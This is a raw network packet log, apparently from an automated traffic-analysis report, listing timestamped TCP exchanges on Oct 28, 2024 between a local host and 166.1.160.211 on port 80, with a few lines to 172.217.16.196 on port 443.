                                                                                                                                                              Oct 28, 2024 19:46:18.280913115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280949116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280977964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281008005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281013012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281047106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281066895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281081915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281116962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281137943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281151056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281186104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281208992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281784058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281820059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281836033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281867981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281902075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281920910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281936884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281970024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281991959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282004118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282037020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282053947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282078981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282135963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282721996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282757044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282790899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282818079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282825947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282861948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282876015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282897949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282929897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282944918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282963991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283018112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.283406019 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:18.283458948 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283544064 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:18.283545971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283581972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283615112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283643007 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.283649921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283684969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283701897 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.283719063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283752918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283754110 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:18.283771038 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283780098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.283787012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.283844948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.284449100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284488916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284521103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284538031 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.284557104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284591913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284605980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.284626961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284661055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284677982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.284694910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284725904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.284749985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.285067081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285119057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.285120010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285156012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285187960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285202026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.285222054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285257101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285270929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.285291910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285326004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285340071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.285361052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285394907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285409927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.285429955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.285480976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.286058903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286093950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286128998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286138058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.286163092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286196947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286210060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.286232948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286267996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286284924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.286303043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286336899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286351919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.286372900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286422968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.286950111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.286984921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287019014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287029028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.287053108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287087917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287103891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.287122965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287156105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287173033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.287189960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287224054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287240982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.287259102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287308931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.287849903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287885904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287919044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287946939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.287954092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.287986994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288005114 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.288021088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288055897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288078070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.288090944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288125992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288146019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.288160086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288213968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.288656950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288691044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288724899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288744926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.288820028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288855076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288877964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.288935900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288969994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.288985014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.289005041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289038897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289057970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.289073944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289107084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289123058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.289140940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289175034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289201021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.289860010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289896011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289920092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.289932013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289966106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.289998055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.289999008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290034056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290052891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.290066957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290102005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290116072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.290137053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290170908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290189981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.290766954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290802956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290821075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.290837049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290870905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290887117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.290910959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290945053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.290960073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.290981054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291014910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291028976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.291049004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291083097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291099072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.291654110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291701078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291722059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.291737080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291770935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291790962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.291805029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291838884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291852951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.291873932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291909933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291929960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.291944027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291977882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.291992903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.292516947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292552948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292565107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.292587996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292622089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292635918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.292656898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292690992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292707920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.292725086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292758942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292774916 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.292793036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292828083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292844057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293351889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293385983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293405056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293421030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293454885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293488979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293489933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293523073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293545008 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293556929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293591022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293608904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293625116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293658972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293670893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293694019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293744087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294255972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294291019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294326067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294359922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294363022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294393063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294406891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294429064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294461966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294486046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294517040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294553995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294572115 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294589043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294624090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294646025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294656992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294711113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.327984095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328001022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328016996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328053951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328069925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328085899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328087091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328102112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328119040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328149080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328176975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328691006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328759909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328798056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328814983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328833103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328869104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328886986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328903913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328938961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328968048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328977108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329013109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329025984 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329051018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329128027 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329385042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329421043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329456091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329473972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329490900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329525948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329547882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329560995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329596043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329611063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329632044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329680920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.330001116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.330035925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.330069065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.330121994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.376228094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.436577082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.442821980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443022013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443057060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443087101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443181038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443214893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443239927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443248987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443301916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443310022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443685055 CET8049726166.1.160.211192.168.2.16
